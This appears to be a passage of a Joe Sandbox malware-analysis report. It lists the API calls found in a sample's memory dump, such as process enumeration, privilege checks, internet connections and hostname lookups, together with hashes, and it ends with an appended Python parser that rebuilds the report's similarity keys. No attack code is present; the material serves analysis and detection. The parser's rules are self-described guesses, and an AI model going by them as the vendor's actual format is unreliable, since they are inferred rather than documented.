                                                                                                                      • GetCaretPos.USER32(?), ref: 00544F13
                                                                                                                      • ClientToScreen.USER32(00000000,?), ref: 00544F4E
                                                                                                                      • GetForegroundWindow.USER32 ref: 00544F54
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.2175789165.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.2175772647.00000000004C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.2175874468.000000000054F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.2175874468.0000000000574000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.2175964673.000000000057E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.2175997453.0000000000587000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_4c0000_9MZZG92yMO.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2759813231-0
                                                                                                                      • Opcode ID: e421803582a9da2f95a17a866a247cd137496fc0a8af505d2523be975ed42abc
                                                                                                                      • Instruction ID: f5bf9a81bcde7f1ab1949a36613658dfd2ec3a994391b0d816d44573f8c8adfa
                                                                                                                      • Opcode Fuzzy Hash: e421803582a9da2f95a17a866a247cd137496fc0a8af505d2523be975ed42abc
                                                                                                                      • Instruction Fuzzy Hash: 64312E75D00108AFDB00EFA6C885EEFB7F9EF95304F10446AE415E7241DA759E058BA4
                                                                                                                      APIs
                                                                                                                      • CreateToolhelp32Snapshot.KERNEL32 ref: 00523C7A
                                                                                                                      • Process32FirstW.KERNEL32(00000000,?), ref: 00523C88
                                                                                                                      • Process32NextW.KERNEL32(00000000,?), ref: 00523CA8
                                                                                                                      • CloseHandle.KERNEL32(00000000), ref: 00523D52
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.2175789165.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.2175772647.00000000004C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.2175874468.000000000054F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.2175874468.0000000000574000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.2175964673.000000000057E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.2175997453.0000000000587000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_4c0000_9MZZG92yMO.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 420147892-0
                                                                                                                      • Opcode ID: 7b3791877ee49fc00a7f8d0465d38c6c81e31538d1b37936bea3a24436c224b4
                                                                                                                      • Instruction ID: bfd05a80285150cd4d2e1b3f224e4c8f4054f9cef9b9757378d978ad35be5029
                                                                                                                      • Opcode Fuzzy Hash: 7b3791877ee49fc00a7f8d0465d38c6c81e31538d1b37936bea3a24436c224b4
                                                                                                                      • Instruction Fuzzy Hash: CC31C4751083059FD300EF55D881FAFBBE8FF96358F50082DF581861A1EB75AA49CB52
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 004C2612: GetWindowLongW.USER32(?,000000EB), ref: 004C2623
                                                                                                                      • GetCursorPos.USER32(?), ref: 0054C4D2
                                                                                                                      • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,004FB9AB,?,?,?,?,?), ref: 0054C4E7
                                                                                                                      • GetCursorPos.USER32(?), ref: 0054C534
                                                                                                                      • DefDlgProcW.USER32(?,0000007B,?,?,?,?,?,?,?,?,?,?,004FB9AB,?,?,?), ref: 0054C56E
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.2175789165.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.2175772647.00000000004C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.2175874468.000000000054F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.2175874468.0000000000574000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.2175964673.000000000057E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.2175997453.0000000000587000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_4c0000_9MZZG92yMO.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Cursor$LongMenuPopupProcTrackWindow
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2864067406-0
                                                                                                                      • Opcode ID: 7a027ade85c885a79136f9039044c5dd8698493e6d216654292b5da99a0c24a3
                                                                                                                      • Instruction ID: a4fb183bfc23d2e285b149a0205e761faa11c0e397dd97536d73d563d884f977
                                                                                                                      • Opcode Fuzzy Hash: 7a027ade85c885a79136f9039044c5dd8698493e6d216654292b5da99a0c24a3
                                                                                                                      • Instruction Fuzzy Hash: 6D319E39601018AFCB658F58C898EEE7FB5FB4A354F444069F9059B261C731AD50EFA4
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 0051810A: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 00518121
                                                                                                                        • Part of subcall function 0051810A: GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 0051812B
                                                                                                                        • Part of subcall function 0051810A: GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 0051813A
                                                                                                                        • Part of subcall function 0051810A: HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 00518141
                                                                                                                        • Part of subcall function 0051810A: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00518157
                                                                                                                      • LookupPrivilegeValueW.ADVAPI32(00000000,?,?), ref: 005186A3
                                                                                                                      • _memcmp.LIBCMT ref: 005186C6
                                                                                                                      • GetProcessHeap.KERNEL32(00000000,00000000), ref: 005186FC
                                                                                                                      • HeapFree.KERNEL32(00000000), ref: 00518703
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.2175789165.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.2175772647.00000000004C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.2175874468.000000000054F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.2175874468.0000000000574000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.2175964673.000000000057E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.2175997453.0000000000587000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_4c0000_9MZZG92yMO.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Heap$InformationProcessToken$AllocErrorFreeLastLookupPrivilegeValue_memcmp
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1592001646-0
                                                                                                                      • Opcode ID: 87f6f1b4df6c697e7f20e6442b28cb6590d2137cfba95a46b6263c7ea6bd0d78
                                                                                                                      • Instruction ID: 127cfb0b3fd5fdd42ea809099ab500159f64849eff7c83f995f5db76b8971e97
                                                                                                                      • Opcode Fuzzy Hash: 87f6f1b4df6c697e7f20e6442b28cb6590d2137cfba95a46b6263c7ea6bd0d78
                                                                                                                      • Instruction Fuzzy Hash: C5217A31E40108EBEB20DFA8C948BFEBBB8FF51308F144059E444AB241DB35AE45CB50
                                                                                                                      APIs
                                                                                                                      • __setmode.LIBCMT ref: 004E09AE
                                                                                                                        • Part of subcall function 004C5A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,00527896,?,?,00000000), ref: 004C5A2C
                                                                                                                        • Part of subcall function 004C5A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,00527896,?,?,00000000,?,?), ref: 004C5A50
                                                                                                                      • _fprintf.LIBCMT ref: 004E09E5
                                                                                                                      • OutputDebugStringW.KERNEL32(?), ref: 00515DBB
                                                                                                                        • Part of subcall function 004E4AAA: _flsall.LIBCMT ref: 004E4AC3
                                                                                                                      • __setmode.LIBCMT ref: 004E0A1A
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.2175789165.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.2175772647.00000000004C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.2175874468.000000000054F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.2175874468.0000000000574000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.2175964673.000000000057E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.2175997453.0000000000587000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_4c0000_9MZZG92yMO.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: ByteCharMultiWide__setmode$DebugOutputString_flsall_fprintf
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 521402451-0
                                                                                                                      • Opcode ID: 1c19ee57d403acba0858323f38591a736cc2ffbb6af11325e035ead7f01c6742
                                                                                                                      • Instruction ID: c2f3c5c3b0312db85cda506529e76c71c1d97bd54c684a9473d956bd34d31c0f
                                                                                                                      • Opcode Fuzzy Hash: 1c19ee57d403acba0858323f38591a736cc2ffbb6af11325e035ead7f01c6742
                                                                                                                      • Instruction Fuzzy Hash: E911B7395042887FCB00B2B7AC4ADFE7B68AFD2329F14006FF100531C2EE78198653A8
                                                                                                                      APIs
                                                                                                                      • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 005317A3
                                                                                                                        • Part of subcall function 0053182D: InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 0053184C
                                                                                                                        • Part of subcall function 0053182D: InternetCloseHandle.WININET(00000000), ref: 005318E9
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.2175789165.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.2175772647.00000000004C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.2175874468.000000000054F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.2175874468.0000000000574000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.2175964673.000000000057E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.2175997453.0000000000587000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_4c0000_9MZZG92yMO.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Internet$CloseConnectHandleOpen
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1463438336-0
                                                                                                                      • Opcode ID: 0c9e1c02ab391e5aafc54ad0596f85c7792f6456682fbce6c36d8287b05d5034
                                                                                                                      • Instruction ID: 67eb8cf21d18a9b064e613e847e363241c04c6e40596b3f9ffb9e75adb4d0b67
                                                                                                                      • Opcode Fuzzy Hash: 0c9e1c02ab391e5aafc54ad0596f85c7792f6456682fbce6c36d8287b05d5034
                                                                                                                      • Instruction Fuzzy Hash: F121F335200A01BFEB129F74DC01FBBBFA9FF89710F14442AFA0596650DB71D811A7A8
                                                                                                                      APIs
                                                                                                                      • GetFileAttributesW.KERNEL32(?,0054FAC0), ref: 00523A64
                                                                                                                      • GetLastError.KERNEL32 ref: 00523A73
                                                                                                                      • CreateDirectoryW.KERNEL32(?,00000000), ref: 00523A82
                                                                                                                      • CreateDirectoryW.KERNEL32(?,00000000,00000000,000000FF,0054FAC0), ref: 00523ADF
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.2175789165.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.2175772647.00000000004C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.2175874468.000000000054F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.2175874468.0000000000574000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.2175964673.000000000057E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.2175997453.0000000000587000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_4c0000_9MZZG92yMO.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: CreateDirectory$AttributesErrorFileLast
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2267087916-0
                                                                                                                      • Opcode ID: 36475016b578ab5397588cfe86ecc51261e0652d5e58e79bee81a2d79fc3a8fa
                                                                                                                      • Instruction ID: a26f8213853f60fa8a3930f1edd1241fcfe2897eff2acb48785290060d37a11a
                                                                                                                      • Opcode Fuzzy Hash: 36475016b578ab5397588cfe86ecc51261e0652d5e58e79bee81a2d79fc3a8fa
                                                                                                                      • Instruction Fuzzy Hash: AD21A3785082119F8300DF29D8819AF7BE4BE5A368F144A2EF499C72E1D735DE4ACB42
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 0051F0BC: lstrlenW.KERNEL32(?,00000002,?,?,000000EF,?,0051DCD3,?,?,?,0051EAC6,00000000,000000EF,00000119,?,?), ref: 0051F0CB
                                                                                                                        • Part of subcall function 0051F0BC: lstrcpyW.KERNEL32(00000000,?,?,0051DCD3,?,?,?,0051EAC6,00000000,000000EF,00000119,?,?,00000000), ref: 0051F0F1
                                                                                                                        • Part of subcall function 0051F0BC: lstrcmpiW.KERNEL32(00000000,?,0051DCD3,?,?,?,0051EAC6,00000000,000000EF,00000119,?,?), ref: 0051F122
                                                                                                                      • lstrlenW.KERNEL32(?,00000002,?,?,?,?,0051EAC6,00000000,000000EF,00000119,?,?,00000000), ref: 0051DCEC
                                                                                                                      • lstrcpyW.KERNEL32(00000000,?,?,0051EAC6,00000000,000000EF,00000119,?,?,00000000), ref: 0051DD12
                                                                                                                      • lstrcmpiW.KERNEL32(00000002,cdecl,?,0051EAC6,00000000,000000EF,00000119,?,?,00000000), ref: 0051DD46
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.2175789165.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                       • Associated: 00000000.00000002.2175772647.00000000004C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.2175874468.000000000054F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.2175874468.0000000000574000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.2175964673.000000000057E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.2175997453.0000000000587000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_4c0000_9MZZG92yMO.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: lstrcmpilstrcpylstrlen
                                                                                                                      • String ID: cdecl
                                                                                                                      • API String ID: 4031866154-3896280584
                                                                                                                      • Opcode ID: 05084513d91e696192e0bdecf3d00046fa0cad71156a1ea56ff35a63c5989ae6
                                                                                                                      • Instruction ID: 68ced251340f938a02d067508e661893b6ce2715b48f288c869077111ea91644
                                                                                                                      • Opcode Fuzzy Hash: 05084513d91e696192e0bdecf3d00046fa0cad71156a1ea56ff35a63c5989ae6
                                                                                                                      • Instruction Fuzzy Hash: 3611D63A100305EBDB159F34EC49DBA7BB9FF45354B40402AF806CB250EB719880D7A5
                                                                                                                      APIs
                                                                                                                      • _free.LIBCMT ref: 004F5101
                                                                                                                        • Part of subcall function 004E571C: __FF_MSGBANNER.LIBCMT ref: 004E5733
                                                                                                                        • Part of subcall function 004E571C: __NMSG_WRITE.LIBCMT ref: 004E573A
                                                                                                                        • Part of subcall function 004E571C: RtlAllocateHeap.NTDLL(01070000,00000000,00000001,00000000,?,?,?,004E0DD3,?), ref: 004E575F
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.2175789165.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                       • Associated: 00000000.00000002.2175772647.00000000004C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.2175874468.000000000054F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.2175874468.0000000000574000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.2175964673.000000000057E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.2175997453.0000000000587000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_4c0000_9MZZG92yMO.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: AllocateHeap_free
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 614378929-0
                                                                                                                      • Opcode ID: dfc2f85840818146ca5ab4fd5341d016bf5043df46e39e270b1bc0da2098bd6b
                                                                                                                      • Instruction ID: 7c1d9ea85e6526f7f86c2b3fd6edca986ff10c30dcb4b3de38abeea27a1e4def
                                                                                                                      • Opcode Fuzzy Hash: dfc2f85840818146ca5ab4fd5341d016bf5043df46e39e270b1bc0da2098bd6b
                                                                                                                      • Instruction Fuzzy Hash: BC11C471D00A19AECF312F76AD05B7E37989B11366F10092FFB49A6251DF3CA8419798
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 004C5A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,00527896,?,?,00000000), ref: 004C5A2C
                                                                                                                        • Part of subcall function 004C5A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,00527896,?,?,00000000,?,?), ref: 004C5A50
                                                                                                                      • gethostbyname.WSOCK32(?), ref: 00536399
                                                                                                                      • WSAGetLastError.WSOCK32(00000000), ref: 005363A4
                                                                                                                      • _memmove.LIBCMT ref: 005363D1
                                                                                                                      • inet_ntoa.WSOCK32(?), ref: 005363DC
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.2175789165.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                       • Associated: 00000000.00000002.2175772647.00000000004C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.2175874468.000000000054F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.2175874468.0000000000574000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.2175964673.000000000057E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.2175997453.0000000000587000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_4c0000_9MZZG92yMO.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: ByteCharMultiWide$ErrorLast_memmovegethostbynameinet_ntoa
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1504782959-0
                                                                                                                      • Opcode ID: 8c7c0522e8f1480fe0baf2098ed647d200d712481b868b7648564fbc37221003
                                                                                                                      • Instruction ID: 0991b44f0696fb8ec1d216bcced7be77de75b0f8defbcc6e1ff0078c27825f15
                                                                                                                      • Opcode Fuzzy Hash: 8c7c0522e8f1480fe0baf2098ed647d200d712481b868b7648564fbc37221003
                                                                                                                      • Instruction Fuzzy Hash: FD119379900109AFCB04FFA5DD46DEEBBB8BF49314B10406EF505A7161DB35AE04DB61
                                                                                                                      APIs
                                                                                                                      • SendMessageW.USER32(?,000000B0,?,?), ref: 00518B61
                                                                                                                      • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00518B73
                                                                                                                      • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00518B89
                                                                                                                      • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00518BA4
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.2175789165.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                       • Associated: 00000000.00000002.2175772647.00000000004C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.2175874468.000000000054F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.2175874468.0000000000574000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.2175964673.000000000057E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.2175997453.0000000000587000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_4c0000_9MZZG92yMO.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: MessageSend
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3850602802-0
                                                                                                                      • Opcode ID: a2a6f970187a4430e720daad87867c79c4833f47fa278a3692a9b39111139efb
                                                                                                                      • Instruction ID: 396a039aaa79305bfda3e89db88dc5a79f958c532ab50772a0966ed47d9e77f1
                                                                                                                      • Opcode Fuzzy Hash: a2a6f970187a4430e720daad87867c79c4833f47fa278a3692a9b39111139efb
                                                                                                                      • Instruction Fuzzy Hash: 5A110679901218BFEB11DBA5C885EEDBBB8FB48710F2040A5EA04B7290DA716E51DB94
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 004C2612: GetWindowLongW.USER32(?,000000EB), ref: 004C2623
                                                                                                                      • DefDlgProcW.USER32(?,00000020,?), ref: 004C12D8
                                                                                                                      • GetClientRect.USER32(?,?), ref: 004FB5FB
                                                                                                                      • GetCursorPos.USER32(?), ref: 004FB605
                                                                                                                      • ScreenToClient.USER32(?,?), ref: 004FB610
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.2175789165.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                       • Associated: 00000000.00000002.2175772647.00000000004C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.2175874468.000000000054F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.2175874468.0000000000574000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.2175964673.000000000057E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.2175997453.0000000000587000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_4c0000_9MZZG92yMO.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Client$CursorLongProcRectScreenWindow
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 4127811313-0
                                                                                                                      • Opcode ID: 3dfbb273aeb7c0584fd308165695e22530fd6a01a64870da6d628110d493b255
                                                                                                                      • Instruction ID: 16353e9a8de4701d560929fcdbe0a9a0ab6ea68d6a262684d618622048ba820f
                                                                                                                      • Opcode Fuzzy Hash: 3dfbb273aeb7c0584fd308165695e22530fd6a01a64870da6d628110d493b255
                                                                                                                      • Instruction Fuzzy Hash: F6115B3D500019ABDB00EF98D889EEEB7B8FB06305F40049AF901E3251C734AA559BA9
                                                                                                                      APIs
                                                                                                                      • GetModuleFileNameW.KERNEL32(?,?,00000104,00000000,00000000), ref: 0051D84D
                                                                                                                      • LoadTypeLibEx.OLEAUT32(?,00000002,?), ref: 0051D864
                                                                                                                      • RegisterTypeLib.OLEAUT32(?,?,00000000), ref: 0051D879
                                                                                                                      • RegisterTypeLibForUser.OLEAUT32(?,?,00000000), ref: 0051D897
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.2175789165.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                       • Associated: 00000000.00000002.2175772647.00000000004C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.2175874468.000000000054F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.2175874468.0000000000574000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.2175964673.000000000057E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.2175997453.0000000000587000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_4c0000_9MZZG92yMO.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Type$Register$FileLoadModuleNameUser
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1352324309-0
                                                                                                                      • Opcode ID: 14428f89cdca3965a955381e054cd97e2f3364f0284c6caa26a734e566f5d5cb
                                                                                                                      • Instruction ID: 6ddfc9bffb27802f1da4809923c551e40e9637688a17371a18be85ef32990e92
                                                                                                                      • Opcode Fuzzy Hash: 14428f89cdca3965a955381e054cd97e2f3364f0284c6caa26a734e566f5d5cb
                                                                                                                      • Instruction Fuzzy Hash: 49115E75605304EBF7208F54DC48FD3BBBCFB00B14F108969A916D6050D7B0E689ABB1
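The Similarity entries above give every function an "API ID" such as ByteCharMultiWide$ErrorLast_memmovegethostbynameinet_ntoa. Comparing those values with the "APIs" lists they belong to shows the key is not a hash of the code: it is a bag of words taken from the API names (subcall lines included), bucketed by how often each word occurs, most frequent bucket first and buckets separated by "$". The parser below is an added example written for this report, not Joe Sandbox's own code. It reads "APIs" lines copied from three of the listings on this page and rebuilds their keys; the word-splitting rules and the STOPWORDS set are assumptions inferred from the values printed here and may differ from the vendor's real implementation.

```python
"""Rebuild the Joe Sandbox "API ID" similarity key from an "APIs" function listing.

Added example for this report; it is not Joe Sandbox code. The word-splitting
rules and STOPWORDS below were inferred from the API ID values printed on this
page and are assumptions that reproduce those values, not a published spec.
"""
import re
from collections import Counter

# Listings constructed by copying three "APIs" blocks from this report verbatim.
SAMPLE_LISTINGS = {
    "gethostbyname": """\
APIs
  • Part of subcall function 004C5A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,00527896,?,?,00000000), ref: 004C5A2C
  • Part of subcall function 004C5A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,00527896,?,?,00000000,?,?), ref: 004C5A50
• gethostbyname.WSOCK32(?), ref: 00536399
• WSAGetLastError.WSOCK32(00000000), ref: 005363A4
• _memmove.LIBCMT ref: 005363D1
• inet_ntoa.WSOCK32(?), ref: 005363DC
Memory Dump Source
""",
    "typelib": """\
• GetModuleFileNameW.KERNEL32(?,?,00000104,00000000,00000000), ref: 0051D84D
• LoadTypeLibEx.OLEAUT32(?,00000002,?), ref: 0051D864
• RegisterTypeLib.OLEAUT32(?,?,00000000), ref: 0051D879
• RegisterTypeLibForUser.OLEAUT32(?,?,00000000), ref: 0051D897
""",
    "heap": """\
• _free.LIBCMT ref: 004F5101
  • Part of subcall function 004E571C: __FF_MSGBANNER.LIBCMT ref: 004E5733
  • Part of subcall function 004E571C: __NMSG_WRITE.LIBCMT ref: 004E573A
  • Part of subcall function 004E571C: RtlAllocateHeap.NTDLL(01070000,00000000,00000001,00000000,?,?,?,004E0DD3,?), ref: 004E575F
""",
}

# One call line: optional subcall prefix, API name, module, optional argument list, ref address.
LINE_RE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<caller>[0-9A-F]{8}):\s*)?"
    r"(?P<api>[A-Za-z_][A-Za-z0-9_]*)\.(?P<module>[A-Za-z0-9_]+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-F]{8})"
)

# Words present in API names but absent from every API ID on this page
# (GetCursorPos -> "Cursor", DefDlgProcW -> "Proc", LoadTypeLibEx -> "LoadType").
# Assumed stopword list, fitted to the page's examples.
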